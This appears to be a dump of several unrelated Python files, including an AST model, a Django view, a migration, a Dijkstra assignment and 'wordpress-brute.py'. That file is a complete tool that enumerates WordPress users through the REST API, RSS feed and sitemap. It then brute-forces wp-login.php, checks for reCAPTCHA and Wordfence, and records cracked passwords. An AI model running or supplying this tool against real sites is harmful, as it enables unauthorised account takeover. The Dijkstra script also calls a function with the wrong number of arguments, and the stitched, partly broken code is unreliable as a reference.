return pretty.format(indent, call)
def __repr__(self):
"""Return a string representation of this object."""
args = ', '.join(map(str, self.arguments))
if self.is_constructor:
return '[{}] new {}({})'.format(self.result, self.name, args)
if self.method_of:
return '[{}] {}.{}({})'.format(self.result, self.method_of.name,
self.name, args)
return '[{}] {}({})'.format(self.result, self.name, args)
class CodeDefaultArgument(CodeExpression):
"""This class represents a default argument.
Some languages, such as C++, allow function parameters to have
default values when not explicitly provided by the programmer.
This class represents such omitted arguments.
A default argument has only a return type.
"""
def __init__(self, scope, parent, result):
"""Constructor for default arguments.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
result (str): The return type of the argument in the program.
"""
CodeExpression.__init__(self, scope, parent, '(default)', result)
# ----- Statement Entities ----------------------------------------------------
class CodeStatement(CodeEntity):
"""Base class for program statements.
Programming languages often define diverse types of statements
(e.g. return statements, control flow, etc.).
This class provides common functionality for such statements.
In many languages, statements must be contained within a function.
An operator typically has a name (its token), a return type,
and a tuple of its arguments.
"""
def __init__(self, scope, parent):
"""Constructor for statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeEntity.__init__(self, scope, parent)
self._si = -1
@property
def function(self):
"""The function where this statement appears in."""
return self._lookup_parent(CodeFunction)
class CodeJumpStatement(CodeStatement):
"""This class represents a jump statement (e.g. `return`, `break`).
A jump statement has a name. In some cases, it may also have an
associated value (e.g. `return 0`).
"""
def __init__(self, scope, parent, name):
"""Constructor for jump statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.value = None
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeExpression):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
if self.value is not None:
return '{}{} {}'.format(indent, self.name, pretty_str(self.value))
return indent + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.value is not None:
return '{} {}'.format(self.name, str(self.value))
return self.name
class CodeExpressionStatement(CodeStatement):
"""This class represents an expression statement. It is only a wrapper.
Many programming languages allow expressions to be statements
on their own. A common example is the assignment operator, which
can be a statement on its own, but also returns a value when
contained within a larger expression.
"""
def __init__(self, scope, parent, expression=None):
"""Constructor for expression statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
expression (CodeExpression): The expression of this statement.
"""
CodeStatement.__init__(self, scope, parent)
self.expression = expression
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.expression, CodeExpression):
yield self.expression
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return pretty_str(self.expression, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return repr(self.expression)
class CodeBlock(CodeStatement, CodeStatementGroup):
"""This class represents a code block (e.g. `{}` in C, C++, Java, etc.).
Blocks are little more than collections of statements, while being
considered a statement themselves.
Some languages allow blocks to be implicit in some contexts, e.g.
an `if` statement omitting curly braces in C, C++, Java, etc.
This model assumes that control flow branches and functions always
have a block as their body.
"""
def __init__(self, scope, parent, explicit=True):
"""Constructor for code blocks.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
explicit (bool): Whether the block is explicit in the code.
"""
CodeStatement.__init__(self, scope, parent)
self.body = []
self.explicit = explicit
def statement(self, i):
"""Return the *i*-th statement of this block."""
return self.body[i]
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, CodeStatement)
codeobj._si = len(self.body)
self.body.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.body:
return '\n'.join(stmt.pretty_str(indent) for stmt in self.body)
else:
return (' ' * indent) + '[empty]'
def __repr__(self):
"""Return a string representation of this object."""
return str(self.body)
class CodeDeclaration(CodeStatement):
"""This class represents a declaration statement.
Some languages, such as C, C++ or Java, consider this special
kind of statement for declaring variables within a function,
for instance.
A declaration statement contains a list of all declared variables.
"""
def __init__(self, scope, parent):
"""Constructor for declaration statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.variables = []
def _add(self, codeobj):
"""Add a child (variable) to this object."""
assert isinstance(codeobj, CodeVariable)
self.variables.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.variables:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
return spaces + ', '.join(v.pretty_str() for v in self.variables)
def __repr__(self):
"""Return a string representation of this object."""
return str(self.variables)
class CodeControlFlow(CodeStatement, CodeStatementGroup):
"""Base class for control flow structures (e.g. `for` loops).
Control flow statements are assumed to have, at least, one branch
(a boolean condition and a `CodeBlock` that is executed when
the condition is met). Specific implementations may consider
more branches, or default branches (executed when no condition is met).
A control flow statement typically has a name.
"""
def __init__(self, scope, parent, name):
"""Constructor for control flow structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the control flow statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.condition = True
self.body = CodeBlock(scope, self, explicit=False)
def get_branches(self):
"""Return a list of branches, where each branch is a pair of
condition and respective body."""
return [(self.condition, self.body)]
def _set_condition(self, condition):
"""Set the condition for this control flow structure."""
assert isinstance(condition, CodeExpression.TYPES)
self.condition = condition
def _set_body(self, body):
"""Set the main body for this control flow structure."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.body = body
else:
self.body._add(body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return '{} {}'.format(self.name, self.get_branches())
class CodeConditional(CodeControlFlow):
"""This class represents a conditional (`if`).
A conditional is allowed to have a default branch (the `else` branch),
besides its mandatory one.
"""
def __init__(self, scope, parent):
"""Constructor for conditionals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, 'if')
self.else_body = CodeBlock(scope, self, explicit=False)
@property
def then_branch(self):
"""The branch associated with a condition."""
return self.condition, self.body
@property
def else_branch(self):
"""The default branch of the conditional."""
return True, self.else_body
def statement(self, i):
"""Return the *i*-th statement of this block.
Behaves as if the *then* and *else* branches were
concatenated, for indexing purposes.
"""
# ----- This code is just to avoid creating a new list and
# returning a custom exception message.
o = len(self.body)
n = o + len(self.else_body)
if i >= 0 and i < n:
if i < o:
return self.body.statement(i)
return self.else_body.statement(i - o)
elif i < 0 and i >= -n:
if i >= o - n:
return self.else_body.statement(i)
return self.body.statement(i - o + n)
raise IndexError('statement index out of range')
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
k = i + 1
o = len(self.body)
n = o + len(self.else_body)
if k > 0:
if k < o:
return self.body.statement(k)
if k > o and k < n:
return self.else_body.statement(k)
if k < 0:
if k < o - n and k > -n:
return self.body.statement(k)
if k > o - n:
return self.else_body.statement(k)
return None
def get_branches(self):
"""Return a list with the conditional branch and the default branch."""
if self.else_branch:
return [self.then_branch, self.else_branch]
return [self.then_branch]
def _add_default_branch(self, body):
"""Add a default body for this conditional (the `else` branch)."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.else_body = body
else:
self.else_body._add(body)
def __len__(self):
"""Return the length of both branches combined."""
return len(self.body) + len(self.else_body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
for codeobj in self.else_body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}if ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
if self.else_body:
pretty += '\n{}else:\n'.format(spaces)
pretty += self.else_body.pretty_str(indent=indent + 2)
return pretty
class CodeLoop(CodeControlFlow):
"""This class represents a loop (e.g. `while`, `for`).
Some languages allow loops to define local declarations, as well
as an increment statement.
A loop has only a single branch, its condition plus the body
that should be repeated while the condition holds.
"""
def __init__(self, scope, parent, name):
"""Constructor for loops.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the loop statement in the program.
"""
CodeControlFlow.__init__(self, scope, parent, name)
self.declarations = None
self.increment = None
def _set_declarations(self, declarations):
"""Set declarations local to this loop (e.g. `for` variables)."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_increment(self, statement):
"""Set the increment statement for this loop (e.g. in a `for`)."""
assert isinstance(statement, CodeStatement)
self.increment = statement
statement.scope = self.body
def _children(self):
"""Yield all direct children of this object."""
if self.declarations:
yield self.declarations
if isinstance(self.condition, CodeExpression):
yield self.condition
if self.increment:
yield self.increment
for codeobj in self.body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
v = self.declarations.pretty_str() if self.declarations else ''
i = self.increment.pretty_str(indent=1) if self.increment else ''
pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeSwitch(CodeControlFlow):
"""This class represents a switch statement.
A switch evaluates a value (its `condition`) and then declares
at least one branch (*cases*) that execute when the evaluated value
is equal to the branch value. It may also have a default branch.
Switches are often one of the most complex constructs of programming
languages, so this implementation might be lackluster.
"""
def __init__(self, scope, parent):
"""Constructor for switches.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, "switch")
self.cases = []
self.default_case = None
def _add_branch(self, value, statement):
"""Add a branch/case (value and statement) to this switch."""
self.cases.append((value, statement))
def _add_default_branch(self, statement):
"""Add a default branch to this switch."""
self.default_case = statement
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}switch ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeTryBlock(CodeStatement, CodeStatementGroup):
"""This class represents a try-catch block statement.
`try` blocks have a main body of statements, just like regular blocks.
Multiple `catch` blocks may be defined to handle specific types of
exceptions.
Some languages also allow a `finally` block that is executed after
the other blocks (either the `try` block, or a `catch` block, when
an exception is raised and handled).
"""
def __init__(self, scope, parent):
"""Constructor for try block structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.body = CodeBlock(scope, self, explicit=True)
self.catches = []
self.finally_body = CodeBlock(scope, self, explicit=True)
def _set_body(self, body):
"""Set the main body for try block structure."""
assert isinstance(body, CodeBlock)
self.body = body
def _add_catch(self, catch_block):
"""Add a catch block (exception variable declaration and block)
to this try block structure.
"""
assert isinstance(catch_block, self.CodeCatchBlock)
self.catches.append(catch_block)
def _set_finally_body(self, body):
"""Set the finally body for try block structure."""
assert isinstance(body, CodeBlock)
self.finally_body = body
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body._children():
yield codeobj
for catch_block in self.catches:
for codeobj in catch_block._children():
yield codeobj
for codeobj in self.finally_body._children():
yield codeobj
def __len__(self):
"""Return the length of all blocks combined."""
n = len(self.body) + len(self.catches) + len(self.finally_body)
n += sum(map(len, self.catches))
return n
def __repr__(self):
"""Return a string representation of this object."""
return 'try {} {} {}'.format(self.body, self.catches,
self.finally_body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'try:\n'
pretty += self.body.pretty_str(indent=indent + 2)
for block in self.catches:
pretty += '\n' + block.pretty_str(indent)
if len(self.finally_body) > 0:
pretty += '\n{}finally:\n'.format(spaces)
pretty += self.finally_body.pretty_str(indent=indent + 2)
return pretty
class CodeCatchBlock(CodeStatement, CodeStatementGroup):
"""Helper class for catch statements within a try-catch block."""
def __init__(self, scope, parent):
"""Constructor for catch block structures."""
CodeStatement.__init__(self, scope, parent)
self.declarations = None
self.body = CodeBlock(scope, self, explicit=True)
def _set_declarations(self, declarations):
"""Set declarations local to this catch block."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_body(self, body):
"""Set the main body of the catch block."""
assert isinstance(body, CodeBlock)
self.body = body
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.declarations, CodeStatement):
yield self.declarations
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return 'catch ({}) {}'.format(self.declarations, self.body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
decls = ('...' if self.declarations is None
else self.declarations.pretty_str())
body = self.body.pretty_str(indent=indent + 2)
pretty = '{}catch ({}):\n{}'.format(spaces, decls, body)
return pretty
###############################################################################
# Helpers
###############################################################################
def pretty_str(something, indent=0):
"""Return a human-readable string representation of an object.
Uses `pretty_str` if the given value is an instance of
`CodeEntity` and `repr` otherwise.
Args:
something: Some value to convert.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if isinstance(something, CodeEntity):
return something.pretty_str(indent=indent)
else:
return (' ' * indent) + repr(something)
| 1.765625 | 2 |
api/views/todo_views.py | felipe-menelau/todo-list-web | 0 | 5590 | from django.contrib.auth.models import User
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from api.serializers import TODOListSerializer
from api.models import TODOList
class TODOListViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated]
serializer_class = TODOListSerializer
def get_queryset(self):
user = self.request.user
return TODOList.objects.filter(owner=self.request.user).order_by('created_at')
def create(self, request, *args, **kwargs):
request.data['owner'] = request.user.id
return super(self.__class__, self).create(request, *args, **kwargs)
| 2.015625 | 2 |
Python/Tests/TestData/ProjectHomeProjects/Subfolder/ProgramB.py | techkey/PTVS | 404 | 5591 | # ProgramB.py
print('Hello World')
| 1.171875 | 1 |
donation/migrations/0043_auto_20180109_0012.py | effective-altruism-australia/donation-portal | 1 | 5592 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def copy_existing_referrals_into_new_field(apps, schema_editor):
Pledge = apps.get_model('donation', 'Pledge')
Referral = apps.get_model('donation', 'Referral')
reasons = Pledge.objects.values_list('how_did_you_hear_about_us', flat=True).distinct()
for reason in reasons:
if reason: # Filter out None and u''
Referral.objects.create(reason=reason)
for pledge in Pledge.objects.all():
reason = pledge.how_did_you_hear_about_us
if reason:
pledge.how_did_you_hear_about_us_db = Referral.objects.get(reason=reason)
pledge.save()
class Migration(migrations.Migration):
dependencies = [
('donation', '0042_amend_donation_view'),
]
operations = [
migrations.CreateModel(
name='Referral',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reason', models.CharField(max_length=256)),
],
),
migrations.AddField(
model_name='pledge',
name='how_did_you_hear_about_us_db',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, verbose_name='How did you hear about us?', blank=True, to='donation.Referral', null=True),
),
migrations.RunPython(copy_existing_referrals_into_new_field)
]
| 1.867188 | 2 |
python/is_even.py | c1m50c/twitter-examples | 0 | 5593 | <reponame>c1m50c/twitter-examples<gh_stars>0
def is_even(i: int) -> bool:
if i == 1:
return False
elif i == 2:
return True
elif i == 3:
return False
elif i == 4:
return True
elif i == 5:
...
# Never do that! Use one of these instead...
is_even = lambda i : i % 2 == 0
is_even = lambda i : not i & 1
is_odd = lambda i : not is_even(i) | 3.5 | 4 |
wordpress-brute.py | RandomRobbieBF/wordpress-bf | 1 | 5594 | <filename>wordpress-brute.py
#!/usr/bin/env python
#
# Wordpress Bruteforce Tool
#
# By @random_robbie
#
#
import requests
import json
import sys
import argparse
import re
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL")
parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File")
args = parser.parse_args()
url = args.url
passfile = args.file
http_proxy = ""
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}
# Grab Wordpress Users via Wordpress JSON api
def grab_users_api(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict)
if 'rest_user_cannot_view' in response.text:
print ("[-] REST API Endpoint Requires Permissions [-]")
return False
if response.status_code == 404:
print ("[-] Rest API Endpoint returns 404 Not Found [-]")
return False
elif response.status_code == 200:
jsonstr = json.loads(response.content)
return jsonstr
# Grab Wordpress Users via Sitemap
def grab_users_sitemap(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
return response.text
# Grab Wordpress Users via RSS Feed
def grab_users_rssfeed(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
if "dc:creator" in response.text:
return response.text
# Check we can get to wp-admin login.
def check_wpadmin(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict)
if "Powered by WordPress" in response.text:
if "wp-submit" in response.text:
if "reCAPTCHA" not in response.text:
return True
else:
return False
else:
return False
else:
return False
# Check URL is wordpress
def check_is_wp(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict)
if "wp-content" in response.text:
return True
else:
return False
# Check if wordfence is installed as this limits the logins to 20 per ip
def check_wordfence(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict)
if "Wordfence Security - Firewall & Malware Scan" in response.text:
return True
else:
return False
# Test the logins
def test_login (url,user,password,cnt,attempts):
if str(cnt) == attempts:
print("[-] Stopping as Wordfence will block your IP [-]")
sys.exit(0)
paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"}
headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"wordpress_test_cookie":"WP+Cookie+check"}
response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False)
if response.status_code == 503:
print("[-] Website is giving 503 HTTP Status [-]")
sys.exit(0)
if response.status_code == 502:
print("[-] Website is giving 502 HTTP Status [-]")
sys.exit(0)
if response.status_code == 403:
print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]")
sys.exit(0)
if "Google Authenticator code" in response.text:
print("[-] 2FA is enabled Sorry [-]")
sys.exit(0)
if "wordpress_logged_in" in response.headers['Set-Cookie']:
print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n")
text_file.close()
sys.exit(0)
else:
print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]")
cnt += 1
return cnt
def count_pass(passfile):
count = 0
with open(passfile, 'r') as f:
for line in f:
count += 1
f.close()
return str(count)
# Dont no body like dupes.
def remove_dupes():
lines_seen = set()
outfile = open("users.txt", "w")
for line in open("rssusers.txt", "r"):
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
def attack_restapi(url,attempts,userdata,passfile):
for id in userdata:
user = id['slug']
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
def attack_rssfeed(url,attempts,userdata,passfile):
users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata)
if os.path.exists("rssusers.txt"):
os.remove("rssusers.txt")
if os.path.exists("users.txt"):
os.remove("users.txt")
for user in users:
u = user.replace("[CDATA[","")
text_file = open("rssusers.txt", "a")
text_file.write(""+str(u)+"\n")
text_file.close()
remove_dupes()
with open("users.txt", 'r') as f:
for line in f:
user = line.strip()
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as b:
for line in b:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
b.close()
def attack_sitemap(url,attempts,userdata,passfile):
auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata)
for user in auth:
thisuser = user[1]
h = thisuser.split('/')
user = h[4]
cnt = 1
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
# Time For Some Machine Learning Quality IF statements.
def basic_checks(url):
if check_is_wp(url):
if check_wpadmin(url):
return True
else:
return False
else:
return False
if basic_checks(url):
print("[+] Confirmed Wordpress Website [+]")
else:
print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]")
sys.exit(0)
if os.path.isfile(passfile) and os.access(passfile, os.R_OK):
print("[+] Password List Used: "+passfile+" [+]")
else:
print("[-] Either the file is missing or not readable [-]")
sys.exit(0)
# Method Value for which method to enumerate users from
method = "None"
attempts = "None"
# Which method to use for enumeration
if grab_users_api(url):
print("[+] Users found via Rest API [-]")
method = "restapi"
if grab_users_rssfeed(url) and method == "None":
print("[+] Users found via RSS Feed [+]")
method = "rss"
if grab_users_sitemap(url) and method == "None":
print("[+] Users found via Authors Sitemap [-]")
method = "sitemap"
if method == "None":
print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]")
sys.exit(0)
if check_wordfence(url):
print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]")
attempts = "20"
# Kick off Parsing and attacking
if method == "restapi":
userdata = grab_users_api(url)
attack_restapi(url,attempts,userdata,passfile)
if method == "rss":
userdata = grab_users_rssfeed(url)
attack_rssfeed(url,attempts,userdata,passfile)
if method == "sitemap":
userdata = grab_users_sitemap(url)
attack_sitemap(url,attempts,userdata,passfile)
| 2.5 | 2 |
graph_search/week2/assignment_dijkstra_shortest_paths.py | liaoaoyuan97/standford_algorithms_specialization | 0 | 5595 | import heapq
import time
from os import path
from math import floor
class Heap:
def __init__(self):
self.size = 0
self.array = []
self.v2index_map = {}
def __get_parent_index(self, idx):
return int(floor((idx - 1) / 2))
def __get_left_child_index(self, idx):
return 2 * idx + 1
def __get_right_child_index(self, idx):
return 2 * idx + 2
def __swap_value(self, i, j):
t = self.array[i]
self.v2index_map[t[0]] = j
self.v2index_map[self.array[j][0]] = i
self.array[i] = self.array[j]
self.array[j] = t
def __bubble_up(self, idx):
parent_idx = self.__get_parent_index(idx)
while parent_idx >= 0:
if self.array[parent_idx][1] <= self.array[idx][1]:
break
self.__swap_value(parent_idx, idx)
idx = parent_idx
parent_idx = self.__get_parent_index(idx)
def __bubble_down(self, idx):
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
while left_idx < self.size or right_idx < self.size:
min_idx = left_idx
if left_idx >= self.size or (right_idx < self.size and self.array[right_idx][1] < self.array[left_idx][1]):
min_idx = right_idx
if self.array[idx][1] < self.array[min_idx][1]:
break
self.__swap_value(idx, min_idx)
idx = min_idx
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
def get_vertex_key(self, v_id):
return self.array[self.v2index_map[v_id]][1]
def pop(self):
if self.size < 1:
raise IndexError
min_node = self.array[0]
self.size = self.size - 1
self.__swap_value(0, self.size)
self.array.pop()
if self.size > 1:
self.__bubble_down(0)
del self.v2index_map[min_node[0]]
return min_node
def insert(self, node):
self.array.append(node)
self.v2index_map[node[0]] = self.size
self.size = self.size + 1
if self.size > 1:
self.__bubble_up(self.size - 1)
def modify_key(self, v_id, update_val):
idx = self.v2index_map[v_id]
self.array[idx] = (v_id, update_val)
parent_idx = self.__get_parent_index(idx)
if parent_idx >= 0 and self.array[idx][1] < self.array[parent_idx][1]:
self.__bubble_up(idx)
else:
self.__bubble_down(idx)
def read_graph(filename):
graph = dict()
with open(path.join('.', filename), 'r') as f:
for row in f.readlines():
edges = row.strip('\t\n').split('\t')
s = int(edges[0])
graph[s] = []
for i in range(1, len(edges)):
edge = edges[i].split(',')
graph[s].append((int(edge[0]), int(edge[1])))
return graph
def get_shortest_paths_heapq(graph):
heap = []
heapq.heappush(heap, (0, 1)) # (dj_score, vertex_id)
distances = {i: 1000000 for i in graph}
distances[1] = 0
X = []
while heap:
cur_distance, cur_v = heapq.heappop(heap)
if cur_distance > distances[cur_v]:
continue
# added to X
X.append(cur_v)
for neighbor, weight in graph[cur_v]:
dj_score = cur_distance + weight
if dj_score < distances[neighbor]:
distances[neighbor] = dj_score
heapq.heappush(heap, (dj_score, neighbor))
return distances, X
def get_shortest_paths_self_defined_heap(graph):
heap = Heap()
heap.insert((1, 0)) # (vertex_id, dj_score)
for v in graph:
if v != 1:
heap.insert((v, 1000000))
shortest_paths = dict()
n_v = len(graph)
while len(shortest_paths) < n_v:
assert len(shortest_paths) + heap.size == n_v
cur_v, v_score = heap.pop()
shortest_paths[cur_v] = v_score
for neighbor, weight in graph[cur_v]:
dj_score = v_score + weight
# import pdb;pdb.set_trace()
if neighbor not in shortest_paths and dj_score < heap.get_vertex_key(neighbor):
heap.modify_key(neighbor, dj_score)
return shortest_paths
if __name__ == "__main__":
# test case 1, output: {1: 0, 2: 1, 3: 2, 4: 2, 5: 3, 6: 4}
# graph = {
# 1: [(6, 7), (5, 3), (2, 1), (4, 2), (3, 3)],
# 2: [(1, 1), (3, 1), (4, 1), (6, 6)],
# 3: [(1, 3), (2, 1), (6, 2)],
# 4: [(2, 1), (1, 2), (6, 5)],
# 5: [(1, 3), (6, 3)],
# 6: [(1, 7), (3, 2), (2, 6), (4, 5), (5, 3)]
# }
graph = read_graph("Dijkstra.txt")
dedup_edges = set()
for k, _ in graph.items():
for v in _:
dedup_edges.add((k, v[0], v[1]))
dedup_edges.add((v[0], k, v[1]))
assert len(dedup_edges) == sum([len(e) for e in graph.values()])
# graph = {}
# heap = Heap()
# heap.insert((1,0))
# heap.insert((2,0))
# heap.pop()
start_t = time.time()
min_distances,X = get_shortest_paths_heapq(graph)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
start_t = time.time()
min_distances = get_shortest_paths_self_defined_heap(graph, X)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
| 3.328125 | 3 |
ssod/utils/structure_utils.py | huimlight/SoftTeacher | 604 | 5596 | <reponame>huimlight/SoftTeacher<gh_stars>100-1000
import warnings
from collections import Counter, Mapping, Sequence
from numbers import Number
from typing import Dict, List
import numpy as np
import torch
from mmdet.core.mask.structures import BitmapMasks
from torch.nn import functional as F
_step_counter = Counter()
def list_concat(data_list: List[list]):
if isinstance(data_list[0], torch.Tensor):
return torch.cat(data_list)
else:
endpoint = [d for d in data_list[0]]
for i in range(1, len(data_list)):
endpoint.extend(data_list[i])
return endpoint
def sequence_concat(a, b):
if isinstance(a, Sequence) and isinstance(b, Sequence):
return a + b
else:
return None
